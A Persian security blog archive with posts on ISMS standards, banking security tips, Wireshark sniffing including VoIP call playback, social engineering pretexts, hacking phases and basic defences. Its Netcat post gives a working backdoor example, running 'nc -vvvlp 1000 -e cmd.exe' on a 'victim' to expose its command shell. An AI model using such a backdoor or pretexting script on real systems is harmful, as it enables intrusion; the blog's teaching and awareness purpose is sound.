کارگاه یک روزه امنیت اطلاعات ویژه اعضای هیئت علمی

کارگاه یک روزه امنیت اطلاعات

ویژه اعضای محترم هیئت علمی دانشگاه آزاد اسلامی واحد میمه

توسط مهندس محمد جواد بابائی برگزار شد.

 

در این دوره اساتید این دانشگاه از رشته های مختلف نظیر نفت ، حقوق ،زمین شناسی، معدن،  ادبیات و علوم انسانی ، زبان ، گروه کامپیوتر و ... با مبانی امنیت اطلاعات در فضای مجازی آشنا شدند.

در این کارگاه هشت ساعته ، اصول امنیت در فضای مجازی برای اعضای محترم هیئت علمی تبیین گردید.

همچنین شرکت کنندگان در این دوره با انواع حملات سایبری نظیر DOS , DDOS , Smurf , land Attack و ... آشنا شدند.

در ادامه سایر خطرات امنیتی در فضای مجازی نظیر خطرات ناشی از Sniffing , phishing , worms  و انواع ویروس ها و راه های پیشگیری از هرکدام به صورت تصویری آموزش داده شد.

به شرکت کنندگان در این دوره که دارای امتیاز نیم واحد درسی بوده گواهی شرکت در دوره اعطا گردید.

 

+ نوشته شده در پنجشنبه یازدهم مهر ۱۳۹۲ ساعت 6:44 توسط کاربر ارشد  | 

توصیه های امنیتی در هنگام استفاده از خدمات بانکی


بانک مرکزی در راستای تامین امنیت بستر فعالیت‌‌های نظام بانکی و لزوم اطلاع‌رسانی به کاربران حقیقی و حقوقی بانک و همچنین پیرو اطلاعیه‌های قبلی، اخیرا توصیه‌های امنیتی در خصوص خدمات حضوری و غیر حضوری را دو بخش ارائه کرده است.

به گزارش روابط عمومی بانک مرکزی جمهوری اسلامی ایران، بانک مرکزی طی اطلاعیه‌ای از شهروندان خواست تا با رعایت مواردی در بانکداری حضوری که شامل دستگاه‌های خودپرداز و کارتخوان و همچنین بانکداری غیر حضوری که در بستر‌های مخابراتی، از قبیل اینترنت بانک، تلفن بانک و همراه بانک، انجام می‌شود، از اطلاعات و سرمایه‌های خود به‌ دقت حفاظت کنند. این موارد شامل نکات زیر می‌باشد:
 

ادامه در ادامه مطلب...

ادامه نوشته
برچسب‌ها: امنیت در خدمات بانکداری الکترونیک
+ نوشته شده در سه شنبه یکم مرداد ۱۳۹۲ ساعت 6:0 توسط کاربر ارشد  | 

ISMS چیست؟

این روزها با توجه به حملات سایبری و ویروسی که اخبارش منتشر میشه ، تب و تاب امنیت همه جا به وجود آمده و اکثر سازمان ها و شرکت هایی که باهاشون کار میکنیم از ما طلب امنیت بیشتر میکنن.

از طرفی امنیت همان طور که قبلا گفته ام یک مقوله ی نسبی است .

یعنی نمیتوان آن را زیاد در قالب دستور و بخش نامه های ثابت آن را اجرا کرد بلکه امنیت در هر محیطی شرایط خاص خود را میطلبد.

در این زمینه استاندارد هایی نیز از سوی مراجع قانونی معتبر منتشر شده است. یکی از استاندارد های جهانی در این زمینه استاندارد iso 27001 میباشد.

سيستم مديريت امنيت اطلاعات یا ISMS  همان استاندارد 27001 iso میباشد . با ارائه اولين استاندارد مديريت امنيت اطلاعات در سال 1995، نگرش سيستماتيک به مقوله ايمن‌سازي فضاي تبادل اطلاعات شکل گرفت. بر اساس اين نگرش، تامين امنيت فضاي تبادل اطلاعات سازمانها، دفعتا مقدور نمي‌باشد و لازم است اين امر بصورت مداوم در يک چرخه ايمن‌سازي شامل مراحل طراحي، پياده‌سازي، ارزيابي و اصلاح، انجام گيرد.
ISMS چيست؟
ISMS مخفف عبارت Information Security Management System به معناي سيستم مديريت امنيت اطلاعات مي باشد و استانداردهايي را براي ايمن سازي فضاي تبادل اطلاعات در سازمان ها ارائه مي دهد. اين استانداردها شامل مجموعه اي از دستورالعمل هاست تا فضاي تبادل اطلاعات يک سازمان را با اجراي يک طرح مخصوص به آن سازمان ايمن نمايد.
 
اقدامات لازم جهت ايمن سازي فضاي تبادل اطلاعات
 
1-      تهيه طرح‌ها و برنامه‌هاي امنيتي موردنياز سازمان
2-      ايجاد تشکيلات موردنياز جهت ايجاد و تداوم امنيت فضاي تبادل اطلاعات سازمان
3-      اجراي طرح‌ها و برنامه‌هاي امنيتي سازمان
 
استانداردهاي مديريتي ارائه شده در خصوص امنيت اطلاعات
 
استانداردهاي مديريتي ارائه شده در خصوص امنيت اطلاعات و ارتباطات سازمان‌ها، عبارتند از:
 
1. استاندارد مديريتي BS7799 موسسه استاندارد انگليس
 
که شامل 2 بخش است : BS7799:1 که ISO/IEC 27002 ناميده مي شود که در قالب 10 دسته بندي کلي زير است :
1.        تدوين سياست امنيتي سازمان
2.        ايجاد تشکيلات تامين امنيت سازمان
3.        دسته‌بندي سرمايه‌ها و تعيين کنترل‌هاي لازم
4.        امنيت پرسنلي
5.        امنيت فيزيکي و پيراموني
6.        مديريت ارتباطات
7.        کنترل دسترسي
8.        نگهداري و توسعه سيستم‌ها
9.        مديريت تداوم فعاليت سازمان
10.  پاسخگوئي به نيازهاي امنيتي
BS7799:2 که در سال 2005 به استاندارد ISO/IEC 27001:2005 تبديل شد که شامل 4 مرحله PDCA به معني Plan (مرحله تاسيس و طراحي)، Do (مرحله پياده سازي و عملي کردن) ، Check (مرحله نظارت و مرور) و Act ( مرحله بهبود بخشيدن و اصلاح)است.
  

  
2. استاندارد مديريتي ISO/IEC 17799 موسسه بين‌المللي استاندارد
که همان بخش اول استاندارد BS7799:2 است که در سال 2000  به اين اسم ناميده شد.
 
 
3. گزارش فني ISO/IEC TR 13335 موسسه بين‌المللي استاندارد
 
اين گزارش فني در قالب 5 بخش مستقل در فواصل سالهاي 1996 تا 2001  توسط موسسة بين المللي استاندارد منتشر شده است . اگر چه اين گزارش فني به عنوان استاندارد ISO منتشر نشد و عنوان Technical Report بر آن نهاده شد، ليکن تنها مستندات فني معتبري است که جزئيات و تکنيکهاي مورد نياز مراحل ايمن سازي اطلاعات و ارتباطات را تشريح نموده و در واقع مکمل استانداردهاي مديريتي BS7799 و ISO/IEC 17799 مي باشد و شامل مراحل زير است :
1) تعيين اهداف، راهبردها و سياست‌هاي امنيتي فضاي تبادل اطلاعات سازمان
2) تحليل مخاطرات امنيتي فضاي تبادل اطلاعات سازمان
3) انتخاب حفاظ ها و ارائه طرح امنيت
4) پياده‌سازي طرح امنيت
5) پشتيباني امنيت فضاي تبادل اطلاعات سازمان
 


 مراحل ايمن سازي بر اساس گزارش فني ISO/IEC 13335
 
 
مستندات ISMS
 
بر اساس استانداردهاي مديريت امنيت اطلاعات و ارتباطات، هر دستگاه(سازمان) بايد مجموعه مستندات مديريت امنيت اطلاعات و ارتباطات را به شرح زير، براي خود تدوين نمايد :
•    اهداف، راهبردها و سياستهاي امنيتي فضاي تبادل اطلاعات دستگاه
•    طرح تحليل مخاطرات امنيتي فضاي تبادل اطلاعات دستگاه
•    طرح امنيت فضاي تبادل اطلاعات دستگاه
•    طرح مقابله با حوادث امنيتي و ترميم خرابيهاي فضاي تبادل اطلاعات دستگاه
•    برنامة آگاهي رساني امنيتي به پرسنل دستگاه
•    برنامة آموزش امنيتي پرسنل تشکيلات تامين امنيت فضاي تبادل اطلاعات دستگاه
 
اجزاء و ساختار تشکيلات امنيت
اجزاء تشکيلات امنيت
تشکيلات امنيت شبکه، متشکل از سه جزء اصلي به شرح زير مي باشد :
•    در سطح سياستگذاري : کميته راهبري امنيت فضاي تبادل اطلاعات دستگاه
•    در سطح مديريت اجرائي : مدير امنيت فضاي تبادل اطلاعات دستگاه
•    در سطح فني : واحد پشتيباني امنيت فضاي تبادل اطلاعات دستگاه
 
نحوه ي پياده سازي  ISMS درسازمان ها
 
سازمان ها وقتي مي خواهند گواهينامه بگيرند، اقدام به دريافت آن کرده و به شرکت هايي که اين خدمات را ارائه مي دهند مراجعه مي کنند.شرکت هاي ارائه دهنده اين خدمات با شرکت هاي خارجي که درزمينه ISMS در ايران شعبه دارندمشاوره کرده و در نهايت مشاوري از سوي شرکت براي آن سازمان مي فرستند.مشاور در جلسه هيات مديره خط مشي امنيتي را مشخص و پياده سازي صورت ميگيرد. شکل زير مراحل اعطاي گواهينامه ISMS را نمايش مي دهد.
 
 

 
مشکلات موجود در زمينه پياده سازي ISMS
 
1. امنيت يکفرهنگ است قبل از آنکه يک فناوري باشد. براين اساس پياده سازي مديريت امنيت قبل ازخريد تجهيزات امنيتي توصيه مي گردد. وقتي امنيت فرهنگ باشد عمري لازم است تا يکفرهنگ ايجاد شود و جا بيفتد. وقتي امنيت فرهنگ باشد نمي توان فرهنگ سازي سازمانيبومي شده در يک کشور پيشرفته اروپايي را به سادگي در يک مرحله ضربتي به يک سازمانديگر وارد نمود. اين يکي از اصلي ترين موانع در پياده سازي استانداردهاي مديريتامنيت است.
2. امنيت تداوم مي خواهد. حتي اگر موفق شويم در يک سازمان سيستممديريت امنيت را پياده نموده و گواهي استاندارد مربوطه را هم در يک مرحله اخذنمائيم؛ عدم تداوم آن هيچ آورده اي را از نظر امنيتي براي سازمان نخواهدداشت.
3. مديران سازماني ما احساس ناامني مداوم از فضاي تبادل اطلاعات خودندارند و يا مايملک اطلاعاتي ذي قيمتي را در معرض تهاجم نمي بينند. بر اين اساس،حمايت جدي و همه جانبه از پياده سازي و تداوم استانداردهاي مديريت امنيتندارند.
4. ناامني تداوم دارد. چون ناامني تداوم دارد بايستي امن سازي و تفکرامنيت در همه شئون سازمان تداوم داشته باشد و اعتبار مداوم و ساليانه داشتهباشد.
5. امنيت نا محسوس است. لذا وقتي يک پروژه امنيتي (از نوع مديريت امنيت)انجام مي شود بعضاً مديريت و کارشناسان احساس مي کنند که هيچ اتفاق جديدي نيفتادهاست و ممکن است گلايه کنند که چرا هزينه نموده اند. در پاسخ به اين گلايه بايد فکرکرد که اگر روي امنيت کار نمي شد چه اتفاقي ممکن بود بيفتد. پس بايد در هر زمان ودر هر مکان از فضاي تبادل اطلاعات سازماني به فکر امنيت بود.
 
مزاياي استفاده از ISMS
 
- اطمينان از تداوم تجارت و كاهش صدمات توسط ايمن ساختن اطلاعات و كاهش تهديدها
- اطمينان از سازگاري با استاندارد امنيت اطلاعات و محافظت از داده ها
- قابل اطمينان كردن تصميم گيري ها و محك زدن سيستم مديريت امنيت اطلاعات
- ايجاد اطمينان نزد مشتريان و شركاي تجاري
- امكان رقابت بهتر با ساير شركت ها
- ايجاد مديريت فعال و پويا در پياده سازي امنيت داده ها و اطلاعات
- بخاطر مشكلات امنيتي اطلاعات و ايده هاي خود را در خارج سازمان پنهان نسازيد
 

در بخش های بعدی سعی در آموزش جزئیات بیشتری از این مبحث خواهم داشت.


+ نوشته شده در شنبه سی ام دی ۱۳۹۱ ساعت 0:0 توسط کاربر ارشد  | 

شنود در شبکه

واژه ی Sniff در واقع به معنای بو کشیدن است اما در شبکه به معنای شنود استفاده شده است.

یکی از روش های جمع آوری اطلاعات در شبکه شنود است.

شنود بر دو قسم است:

1- شنود فعال (Active sniff)

2- شنود غیر فعال (Passive sniff)


شنود فعال با استفاده از ابزار هایی نظیر cain انجام میگردد و قابل رد گیری است.

شنود غیر فعال یعنی این که لینکی به شبکه داشته باشیم و از طریق آن و قرار دادن کارت شبکه در حالت بی قید کلیه پکت های عبوری از داخل شبکه را رصد نماییم.

یکی از ابزارهای مفید در این زمینه Wireshark نام دارد. این ابزار برای رصد پکت های شبکه به کار میرود و کاربرد های مثبت بسیاری در زمینه عیب یابی شبکه و کشف حلمه و ... نیز دارد و به خاطر همین قابلیت های زیادی که دارد یکی از ابزار های دست هکر ها نیز به شمار میرود و شما به عنوان متخصص ضد هک باید با آن آشنا باشید.

وقتی برنامه را نصب کردید و آن را اجرا کردید صفحه ای مشابه صفحه زیر خواهید دید که با کلیک کردن بر روی نام  کارت شبکه خود ، رصد شروع خواهد شد.

 

و صفحه به شکل زیر تغییر خواهد کرد.

در این شکل مشاهده میکنید که انواع و اقسام پکت ها در حال عبور هستند که میتوان مبدا ، مقصد ، نوع بسته و محتوای آن را بررسی نمود.

و به این روش میتوان پکت های شبکه را شنود کرد . همچنین شنود ارتباطات VoIP هم با استفاده از یک sniffer، مثل بقیه انواع ترافیک شبکه قابل انجام است. برای تست شنود  مکالمات تلفنی که در بستر اینترنت با استفاده از سرویس Voice over IP در حال عبور است را با این ابزار شنود کرد:


1- نصب Wireshark

2- دانلود نمونه ترافیک حاوی VoIP از سایت Wireshark

3- اجرای Wireshark و باز کردن نمونه فایل فوق

4- انتخاب گزینه Voice Calls از منوی Telephony 

لیستی از تماس ها نشان داده می شود. در این مثال فقط اولین تماس حاوی مکالمه است.

5- اولین تماس را انتخاب و دکمه Player و بعد Decode را بزنید.

6- دو نمودار امواج صوتی مربوط به مکالمه (هر کدام برای یک طرف مکالمه) نشان داده می شود. با انتخاب check box زیر هر نمودار و زدن دکمه Play ، مکالمه مربوط به آن پخش میشود.

+ نوشته شده در یکشنبه بیست و هشتم آبان ۱۳۹۱ ساعت 0:0 توسط کاربر ارشد  | 

NetCat یا چاقوی همه کاره ی سوئیسی

NetCat چیست؟

حتمن میدونید که در دنیا چاقو های همه کاره ی سوئیسی خیلی معروف هستند.

در دنیای شبکه هم از این چاقو ها وجود داره!

اما اسم این ابزار همه کاره Netcat هست

این ابزار هم از ابزار های جمع آوری اطلاعات هست و هم از ابزار های ارتقای سطح دسترسی

نت کت بر اساس یک نظر سنجی که در سایت insecure.org منتشر شد به عنوان دومین ابزار پرکاربرد هک انتخاب شده است.

فایل اجرایی این برنامه nc.exe میباشد. این فایل را در مسیر ویندوز کپی نموده و شروع به کار میکنیم.

nc -vvvlp 1000 دستور شروع به کار ابزار نت کت برای گوش دادن (Listening)

v = verbal یعنی گزارش دادن هر اتفاقی که می افتد

l = یعنی Listen

p = port number


NC -vvv 192.168.100.128 1000 برای وصل شدن به سیستم طرف مقابل با این دستور و آی پی 


مثال بک دور :

روی سیستم قربانی

nc -vvvlp 1000 -e cmd.exe

روی سیستم خودمان

nc -vvv 192.168.100.128 1000

به محض اجرای این دستور کامند پرامپت سیستم قربانی برای ما باز میشود

خوب اگر میخواهید با این ابزار آشنا بشید زحمت بکشید و این فایل را از اینجا دانلود کنید و بخوانید.

 

+ نوشته شده در چهارشنبه بیست و چهارم آبان ۱۳۹۱ ساعت 6:0 توسط کاربر ارشد  | 

روش های جمع آوری اطلاعات

خوب!

داشتیم میگفتیم که حواستان باشه که تخلیه تلفنی نشوید...

اما تخلیه اطلاعاتی همیشه تلفنی نیست.. گاهی از طریق اطلاعاتی که شما در وب سایت تان قرار داده اید ممکن است هک شوید.

یا حتی با استفاده از سرویس های عمومی و رایگان و قانونی که روی اینترنت وجود دارد ممکن است اطلاعات شما دست آدم های نا باب بیافتد.

مثلا ساده ترین شکلش who is است .

شما وقتی یک دامنه ثبت میکنید اطلاعاتی در اختیار nic قرار میدهید که معمولا اطلاعات واقعی هست

به خصوص موقع ثبت دامنه های دات آی آر که دیگه خدا به داد برسه .. شماره کد پستی و شماره ملی و سایز کفش و... را هم ممکنه بپرسن!!

این اطلاعات ممکن است در آینده بر علیه شما استفاده شود توسط هکر ها.

پس لزوما دلیلی ندارد به خصوص در ثبت دامنه های غیر آی آر اطلاعات درستی ثبت کنید.

و نکته دیگر این که شما با عضو شدن در شبکه های اجتماعی گاها از عکس و نام واقعی خود استفاده میکنید که این خودش کار مهندسی اجتماعی را آسان کرده است.

آموزش هک و امنیت را در وب سایت محمد جواد بابائی دنبال کنید : www.MJB.ir

تاریخ تولد ، نام اعضای خانواده ، آدرس و تلفن ، آدرس ایمیل و ... اطلاعاتی است که این روزهای ساده تر به دست می آید.

نکته : 

اطلاعات خود را دو دستی تقدیم نکنید!

آشنایی با برخی از ابزار های جمع آوری اطلاعات:

وقتی میخواهند یک سایت را هک کنند اول باید اطلاعاتی در مورد آن سایت جمع آوری کرد:

سایت up است یا نه

سایت کجا میزبانی میشود

سرور dns  سایت

نام گردانندگان سایت

نوع سیستم عامل سرور و ورژن آن

پورت های باز سرور

انتخاب ابزار مناسب با اطلاعات به دست آمده

آموزش هک و امنیت را در وب سایت محمد جواد بابائی دنبال کنید : www.MJB.ir

ابزار whois

برای این که بفهمیم این سایت را چه کسی ثبت کرده از این ابزار استفاده میکنیم.

مثلا برای این که بفهمیم سایت www.mjb.ir را چه کسی ثبت کرده ، کافیست به سایت nic.ir بروید و با استفاده از سرویس Whois  و وارد کردن نام سایت و پسوند آن (mjb.ir) نام و مشخصات ثبت کننده را مشاهده نمایید.

یا مثلا برای این که بفهمیم دامنه mjb.com متعلق به چه کسی است میتوانیم به یکی از سایت های whois برویم ( مثلا whois.com) و در مورد آن جستجو کنیم.

 

و در خروجی متن زیر را مشاهده مینماییم:

آموزش هک و امنیت را در وب سایت محمد جواد بابائی دنبال کنید : www.MJB.ir

 

+ نوشته شده در سه شنبه بیست و سوم آبان ۱۳۹۱ ساعت 0:0 توسط کاربر ارشد  | 

مهندسی اجتماعی حفره ای که پچ نمیشود!!!

در بخش های قبلی مراحل هک را که گفتیم اولین مرحله آن جمع آوری اطلاعات بود

در مورد جمع آوری اطلاعات روش ها و ابزار های زیادی ، از کندوکاو در سطل زباله گرفته تا پرس و جو و استفاده از ابزار های پیشرفته تا مهندسی اجتماعی...


اما مهندسی اجتماعی..

روشی برای جمع آوری اطلاعات است که به زبان خودمانی میشود مخ زنی

«مهندسی اجتماعی هنر بهره برداری از رفتارهای آسیب پذیر انسان‌ها برای ایجاد شکاف امنیتی بدون هیچ ظن و گمانی از سوی قربانی است.»

در راهنمای مطالعه CISSP، مهندسی اجتماعی به این صورت تعریف شده‌است: «مهارتی است که به وسیله شخصی مجهول، برای بدست آوردن اعتماد افراد درون سازمان و تشویق آنها برای ایجاد تغییرات دلخواه در سیستم‌های IT و در جهت دستیابی به حق دسترسی استفاده می‌شود.» در نسخه انگلسیی زبان ویکی‌پدیا، مهندسی اجتماعی به این صورت تعریف شده‌است: :«مهندسی اجتماعی، تکنیک بدست آوردن اطلاعات محرمانه به وسیله تحریک کاربران مجازاست.» به نقل از ویکیپدیا


یک مهندس اجتماعی موفق اول باید روابط عمومی خوبی داشته باشد. اولین نگاه ، اولین برخورد و اولین سلام عموما تاثیر گذار ترین آن هاست.

به عنوان مثال زمانی که شما میخواهید نام کاربری یک نفر را حدس بزنید باید با روحیات و علایق آن فرد آشنا باشید ( تا حدودی) نام اعضای خانواده او را بدانید .. شماره شناسنامه ، تاریخ تولد خود و سایر اعضای خانواده اش را حتی الامکان بدانید. این ممکن است برای شما کمک کننده باشد. هرچند الان تا حدودی فرهنگ سازی در این زمینه شروع شده و مردم خوشبختانه بسیار آگاهانه تر از قبل عمل میکنند. قبلا من جایی پروژه داشتم که کارمند اونجا کلمه عبورش که عدد 1 بود را برای این که فراموش نکند نوشته بود و زیر شیشه میزش گذاشته بود!!

نوع دیگر از کاربرد های این مهندسی مثلا در برخورد با تکنسین های ساپورت میباشد (Help Desk)

مثلا فردی تماس میگیرد با یخش فنی و میگوید از دفتر مدیر عامل تماس گرفته و آقای مدیر به شدت عصبی هستند و با سیستم میخواهند یک ایمیل بفرستند و از قضا کلمه عبورشان را هم فراموش کرده اند لطفا سریع کلمه عبور ایشان را ریست نمایید... چه اتفاقی می افتد؟ کارمند در به در این کار را سریع انجام میدهد و هکر خوشوقت خیلی سریع با یوزر آقای مدیر کل که تمام دسترسی ها را هم دارد لاگین کرده و پس از یک تفریح حسابی در شبکه شما بدون هیچ رد پایی میزند به چاک. 

در اینجا دو اشکال وجود دارد:

1- قانون Least Privilege رعایت نشده بود برای یوزر آن مدیر محترم. بعضی وقت ها از ترسمان از یک مدیر تمام دسترسی ها را به یوزر او میدهیم و این کار اکثرا لزومی ندارد.

2- روال درستی در سازمان برای ریست کردن پسورد وجود ندارد یا به درستی اجرا نمیشود.  این که من صدای یک مدیر را تقلید کنم و با عصبانیت از یک help desk بخواهم یوزرم را ریست کند وگر نه اخراجش میکنم باید اتفاقا آن helpdesk  را مصمم تر برای اجرای دستورالعمل نماید و محترمانه به آن شخص (ولو خود آن مدیر محترم هم باشد واقعا) بگویم عذر میخواهم شما باید برای انجام این کار این روال را انجام دهید. 

آموزش هک و امنیت را در سایت محمد جواد بابائی دنبال کنید: www.MJB.ir

همیشه هوشیار باشید:

به خصوص در مورد تخلیه تلفنی اطلاعات ، همیشه به فرد پشت خط مضنون باشید.

مهندسین اجتماعی خبره تر حتی به تخلیه تلفنی هم اکتفا نمیکنند و حتی با شخص رو در رو میشوند. مثلا فرض کنید در فرودگاه کسی که چمدان شما را از روی ظاهرا انسان دوستی کمک شما حمل میکند و در پایان خود را با یک کارت ویزیت قلابی معرفی میکند و از شما هم کارت میگیرد ، ماه هاست که شما را زیر نظر داشته و به دنبال موقعیتی برای ورود به زندگی شما و رفاقت و در نهایت قربانی کردن شماست. 

یا شاید یک دوستی که مثلا از یک تصادف ساده شروع میشود و بعد طرف با اصرار شماره شما را برای پرداخت خسارت گرفته و بعد قراری و بعد دوستی و بعد به مرور اعتماد و بعد خدا میداند...

به خصوص این موارد در خارج از کشور ممکن است برای افراد به ویژه متخصصان اتفاق بیافتد و شخص ناخواسته اطلاعاتی را در اختیار فردی قرار دهد که حتی تصورش را نمیتواند بکند.

آموزش هک و امنیت را در سایت محمد جواد بابائی دنبال کنید: www.MJB.ir


برای آشنایی بیشتر و آمادگی برای مقابله با روش ها کتابی را به نام هنر فریب قرار داده ام که پیشنهاد میکنم برای جلوگیری از قربانی شدن حتما مطالعه نمایید. این کتاب نوشته کوین میتنیک است و به زبان اصلی. اگر کسی  از دوستان ترجمه فارسی این کتاب را پیدا کرد معرفی کند تا برای دوستان قرار دهیم. بازهم تاکید میکنم هدف ما در اینجا بیان روش ها جهت بالا بردن دانش افراد و جلوگیری از قربانی شدن افراد است. مسئولیت نوع استفاده از روش ها به عهده ی استفاده کننده است.

امیدوارم به درجه ای از دانش و اعتقاد برسیم که هیچ وقت برای کسی بد نخواهیم... آمین

آموزش هک و امنیت را در سایت محمد جواد بابائی دنبال کنید: www.MJB.ir
+ نوشته شده در یکشنبه بیست و یکم آبان ۱۳۹۱ ساعت 0:0 توسط کاربر ارشد  | 

هک چیست؟

هک چیست؟ 

"رخنه کردن[۱] یا هک به معنی سود بردن از یک روش سریع و هوشمندانه برای حل یک مشکل در رایانه می‌باشد. در علوم مربوط به رایانه معنی هک گاه مساوی معنی کرک (crack) که رمزگشایی است نیز عنوان می‌شود. در گفتگوهای امروزی هک به معنی نفوذ به یک سیستم رایانه‌ای است. و کرک نیز به معنی رمزگشایی است و کراکر به فرد گشاینده رمز می‌گویند.

گستردگی واژهٔ هک منحصر به رایانه نمی‌باشد و توسط افراد با تخصص‌های گوناگون در زمینه‌هایی از قبیل موسیقی، نقاشی و... نیز به کار می‌رود که به معنی دگرگونی‌های هوشمندانه و خلاقانه فرد در آن زمینه می‌باشد." نقل از ویکی پدیا

آموزش هک و امنیت را در سایت محمد جواد بابائی دنبال کنید: www.MJB.ir

بنابر این لزوما نباید هک را به آن معنای سیاه  تصور کنیم . بلکه آن کراک کردن است که معنای قفل شکستن و خسارت زدن و ... دارد. هک یک کار علمی و هنری و خلاقانه است در جهت کمک به انسانیت...

معمولا مراحل هک به این شرح است:

1- جمع آوری اطلاعات

2- شناسایی مقدماتی

3- جمع آوری ابزار لازم

4- حمله

5- تثبیت موقعیت و ارتقای دسترسی

6- پوشاندن رد پا


برخی ابزار های مورد استفاده برای جمع آوری اطلاعات:

nslookup

Tracert

MTR linux

ping

nmap

whois

dig

telnet

whatismyip.com

netcraft.com

packetstormsecurity.com

msf

exploit_db.com

milw0rm.com

آموزش هک و امنیت را در سایت محمد جواد بابائی دنبال کنید: www.MJB.ir


در بخش های بعدی ابتدا هریک از مراحل فوق را توضیح میدهیم سپس شروع به کار با ابزار های فوق به عنوان کار عملی میکنیم

در اینجا ما قصد آموزش هک نداریم. تنها روش های هک را میگوییم و راه مقابله با آن را به ادمین ها یاد میدهیم.

آموزش هک و امنیت را در سایت محمد جواد بابائی دنبال کنید: www.MJB.ir


+ نوشته شده در شنبه بیستم آبان ۱۳۹۱ ساعت 0:0 توسط کاربر ارشد  | 

آشنایی با امنیت - 2

امنیت سه رکن اصلی دارد:

آموزش هک و امنیت را در سایت محمد جواد بابائی دنبال کنید: www.MJB.ir

Availability: داده ها باید همیشه در دسترس افراد مجاز باشد اگر هر عاملی باعث شود که داده ها در دسترس افراد مجاز نباشد، یکی از ارکان مثلث امنیت از بین رفته است . مثلا اگر داده های بانک از دسترس کارمند بانک خارج شود آن کارمند بی چاره چگونه میتواند پاسخگوی صف طویل و عصبانی ارباب رجوع از خود راضی باشد!!

Integrity: جامعیت داده ها باید حفظ شود. یک داده ی نصفه نیمه به هیچ دردی نمیخورد. مثلا اگر یک نامه وسط راه باز شود و یکی از خطوط آن پاک شود آیا دستوراتی که در آن نامه است توسط گیرنده به درستی انجام میشود؟ یا حتی اگر خطی به آن نامه اضافه شود آیا آن نامه دیگر همان نامه ای است که فرستنده ارسال کرده؟

Confidentiality: محرمانگی داده ها همواره باید حفظ شود. قرار نیست همه از داده ها به یک سهم برخوردار شوند. مدیر امور مالی شرکت داده هایی را مجاز است ببیند که کارمند عادی امور اداری حق دیدن آن ها ندارد. همچنین کل این داده ها باید از چشم نامحرمان خارج سازمان مصون بماند.

بدیهی است هریک از این ارکان این مثلث که خللی در آن وارد شود کل امنیت به مخاطره می افتد.

 

آموزش هک و امنیت را در سایت محمد جواد بابائی دنبال کنید: www.MJB.ir

+ نوشته شده در چهارشنبه دهم آبان ۱۳۹۱ ساعت 0:0 توسط کاربر ارشد  | 

آشنایی با امنیت - 1

اولین گام در برقراری امنیت ، امنیت فیزیکی است.

شما در ابتدا باید مراقب باشید کسی وارد محدوده ی ممنوعه شما نشود. مثلا دیتا سنتر

در ادارات دولتی و شرکت هایی که ارباب رجوع مراجعه میکند توجه به امنیت فیزیکی مهم است چون ممکن است دسترسی غیر مجاز ایجاد شود.

مثلا در سالن انتظار شما ممکن است یک نود شبکه در دسترسی ارباب رجوع باشد. یا سیستم وایرلس شما ممکن است امن نباشد و هرکس بتواند با استفاده از لپ تاب خود به شبکه شما وارد شود.

اگر قرار است به مراجعین خود اینترنت رایگان بدهید و یک اکسس پوینت میگذارید که همه به آن بتوانند وصل شوند ، نباید از طرفی آن اکسس پوینت داخل شبکه ی شما باشد.

2- دومین گام این است که دارایی های سازمان را طبقه بندی کنید و بر اساس ارزش آنها برای آن روال حفاظتی تهیه کنید. هزینه ای که در اثر لو رفتن آن اطلاعات به سازمان وارد میشود چقدر است؟ جواب این سوال در تعیین ارزش هر دارایی یا اطلاعات موثر است.

3- آموزش پرسنل: یادتان باشد همه ی اتفاقات بدی که در شبکه می افتد در اثر نفوذ و خرابکاری از بیرون نیست. برخی از آنها سهل انگاری پرسنل نا آگاه خودمان است که فرصت به دست فرصت طلبان داده است.

در دادن دسترسی به پرسنل بذل و بخشش نکنید. 

توجه کنید:

 چه کسی چه میزان دسترسی و تا چه زمانی 

لازم دارد. 

همان قدر به او دسترسی بدهید.

قانون Least Privilage:

کمترین دسترسی ممکن را به هر کاربر بدهید


همچنین هیچ وقت تمام دارایی تان را پشت یک قفل قرار ندهید.

اولا که در جاهای مختلف قرار دهید. یعنی بک آپ که میگیرید در کمد های مختلف یا اطاق های مختلف یا حتی در شهر های مختلف قرار دهید. ( بسته به اهمیت مرکز یا سازمان)

دوما یک قفل راحت تر شکسته میشود تا 3 قفل.

امنیت خود را لایه بندی کنید . مثلا از دو فایروال استفاده کنید . یا ترکیبی کنید.


قانون Defence in Dept:

دفاع در عمق یعنی ساختار امنیتی چند لایه

آموزش هک و امنیت را در سایت محمد جواد بابائی دنبال کنید: www.MJB.ir

+ نوشته شده در دوشنبه یکم آبان ۱۳۹۱ ساعت 0:0 توسط کاربر ارشد  | 
مطالب قدیمی‌تر